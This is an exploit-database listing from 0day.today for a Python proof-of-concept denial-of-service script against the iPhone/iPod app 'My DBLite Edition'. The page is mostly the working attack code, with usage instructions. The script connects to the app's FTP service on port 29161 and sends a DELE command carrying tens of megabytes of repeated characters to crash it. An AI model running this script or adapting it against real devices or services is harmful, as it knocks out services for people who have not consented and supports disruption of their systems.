[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Apple Iphone/Ipod - My DBLite Edition Remote 0day DOS Exploit

Author
Jason Bowes
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10919
Category
dos / poc
Date add
15-02-2010
Platform
unsorted
=============================================================
Apple Iphone/Ipod - My DBLite Edition Remote 0day DOS Exploit
=============================================================

#!/usr/bin/python
#
# Apple Iphone/Ipod - My DBLite Edition #Remote 0day DOS exploit
# Found by: Jason Bowes - admin @ blue-#dogz.com
# App Homepage: www.xenugo.co
# Price: Free
# Download: From the app store (use your #itunes account)
# Tested on: Iphone 3GS - firmware 3.1.2
# What's up to slicc1
# Advisory: ()
 
 
 
 
print "[+] Apple Iphone/Ipod - My DB lite edition Remote DOS exploit"
 
import ftplib
 
from ftplib import FTP
 
import sys
 
import socket
 
 
 
def Usage():
 
    print ("Usage:  ./mydblite.py <serv_ip>\n")
 
    print ("Example:./mydblite.py 192.168.1.3\n")
 
if len(sys.argv) <> 2:
 
        Usage()
 
        sys.exit(1)
 
else:
 
    hostname = sys.argv[1]
 
    delete = "$A$A$A" * 10000000
 
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
    try:
 
        sock.connect((hostname, 29161))
 
        print "[+] Connecting to the target.."
 
    except:
 
        print ("[-] Connection error!")
 
        sys.exit(1)
 
    r=sock.recv(1024)
 
    print "[+] Sending payload..boom..boom..pow"
 
    sock.send("DELE %s\r\n" %delete)
 
print "[+] Server should now be DoS'd!"
 
sys.exit(0);



#  0day.today [2024-11-15]  #